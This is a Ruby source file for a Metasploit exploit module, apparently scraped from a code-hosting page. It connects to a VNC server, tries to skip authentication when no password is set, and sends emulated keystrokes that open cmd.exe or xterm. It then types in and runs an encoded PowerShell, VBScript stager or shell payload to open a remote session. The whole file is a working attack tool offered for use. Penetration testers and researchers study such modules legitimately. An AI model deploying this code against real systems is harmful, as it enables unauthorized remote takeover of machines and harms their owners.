188 lines
6.2 KiB
Ruby
188 lines
6.2 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex/proto/rfb'
|
|
|
|
class Metasploit < Msf::Exploit::Remote
|
|
|
|
Rank = GreatRanking
|
|
WINDOWS_KEY = "\xff\xeb"
|
|
ENTER_KEY = "\xff\x0d"
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Exploit::CmdStager
|
|
include Msf::Exploit::Powershell
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'VNC Keyboard Remote Code Execution',
|
|
'Description' => %q{
|
|
This module exploits VNC servers by sending virtual keyboard keys and executing
|
|
a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
|
|
payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
|
|
and a payload is typed and executed.
|
|
},
|
|
'Author' => [ 'xistence <xistence[at]0x90.nl>' ],
|
|
'Privileged' => false,
|
|
'License' => MSF_LICENSE,
|
|
'Platform' => %w{ win unix },
|
|
'Targets' =>
|
|
[
|
|
[ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
|
|
[ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
|
|
[ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
|
|
],
|
|
'DisclosureDate' => 'Jul 10 2015',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(5900),
|
|
OptString.new('PASSWORD', [ false, 'The VNC password']),
|
|
OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
|
|
], self.class)
|
|
end
|
|
|
|
|
|
def press_key(key)
|
|
keyboard_key = "\x04\x01" # Press key
|
|
keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
|
|
keyboard_key << key # The keyboard key
|
|
# Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
|
|
sock.put(keyboard_key)
|
|
end
|
|
|
|
|
|
def release_key(key)
|
|
keyboard_key = "\x04\x00" # Release key
|
|
keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
|
|
keyboard_key << key # The keyboard key
|
|
# Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
|
|
sock.put(keyboard_key)
|
|
end
|
|
|
|
|
|
def exec_command(command)
|
|
values = command.chars.to_a
|
|
values.each do |value|
|
|
press_key("\x00#{value}")
|
|
release_key("\x00#{value}")
|
|
end
|
|
press_key(ENTER_KEY)
|
|
end
|
|
|
|
|
|
def start_cmd_prompt
|
|
print_status("#{rhost}:#{rport} - Opening Run command")
|
|
# Pressing and holding windows key for 1 second
|
|
press_key(WINDOWS_KEY)
|
|
Rex.select(nil, nil, nil, 1)
|
|
# Press the "r" key
|
|
press_key("\x00r")
|
|
# Now we can release both keys again
|
|
release_key("\x00r")
|
|
release_key(WINDOWS_KEY)
|
|
# Wait a second to open run command window
|
|
select(nil, nil, nil, 1)
|
|
exec_command('cmd.exe')
|
|
# Wait a second for cmd.exe prompt to open
|
|
Rex.select(nil, nil, nil, 1)
|
|
end
|
|
|
|
|
|
def exploit
|
|
|
|
begin
|
|
alt_key = "\xff\xe9"
|
|
f2_key = "\xff\xbf"
|
|
password = datastore['PASSWORD']
|
|
|
|
connect
|
|
vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
|
|
|
|
unless vnc.handshake
|
|
fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
|
|
end
|
|
|
|
if password.nil?
|
|
print_status("#{rhost}:#{rport} - Bypass authentication")
|
|
# The following byte is sent in case the VNC server end doesn't require authentication (empty password)
|
|
sock.put("\x10")
|
|
else
|
|
print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
|
|
if vnc.authenticate(password)
|
|
print_status("#{rhost}:#{rport} - Authenticated")
|
|
else
|
|
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
|
|
end
|
|
end
|
|
|
|
# Send shared desktop
|
|
unless vnc.send_client_init
|
|
fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
|
|
end
|
|
|
|
if target.name =~ /VBScript CMDStager/
|
|
start_cmd_prompt
|
|
print_status("#{rhost}:#{rport} - Typing and executing payload")
|
|
execute_cmdstager({:flavor => :vbs, :linemax => 8100})
|
|
# Exit the CMD prompt
|
|
exec_command('exit')
|
|
elsif target.name =~ /Powershell/
|
|
start_cmd_prompt
|
|
print_status("#{rhost}:#{rport} - Typing and executing payload")
|
|
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
|
|
# Execute powershell payload and make sure we exit our CMD prompt
|
|
exec_command("#{command} && exit")
|
|
elsif target.name =~ /Linux/
|
|
print_status("#{rhost}:#{rport} - Opening 'Run Application'")
|
|
# Press the ALT key and hold it for a second
|
|
press_key(alt_key)
|
|
Rex.select(nil, nil, nil, 1)
|
|
# Press F2 to start up "Run application"
|
|
press_key(f2_key)
|
|
# Release ALT + F2
|
|
release_key(alt_key)
|
|
release_key(f2_key)
|
|
# Wait a second for "Run application" to start
|
|
Rex.select(nil, nil, nil, 1)
|
|
# Start a xterm window
|
|
print_status("#{rhost}:#{rport} - Opening xterm")
|
|
exec_command('xterm')
|
|
# Wait a second for "xterm" to start
|
|
Rex.select(nil, nil, nil, 1)
|
|
# Execute our payload and exit (close) the xterm window
|
|
print_status("#{rhost}:#{rport} - Typing and executing payload")
|
|
exec_command("nohup #{payload.encoded} &")
|
|
exec_command('exit')
|
|
end
|
|
|
|
print_status("#{rhost}:#{rport} - Waiting for session...")
|
|
(datastore['TIME_WAIT']).times do
|
|
Rex.sleep(1)
|
|
|
|
# Success! session is here!
|
|
break if session_created?
|
|
end
|
|
|
|
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
|
|
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
|
|
ensure
|
|
disconnect
|
|
end
|
|
end
|
|
|
|
def execute_command(cmd, opts = {})
|
|
exec_command(cmd)
|
|
end
|
|
|
|
end
|
|
|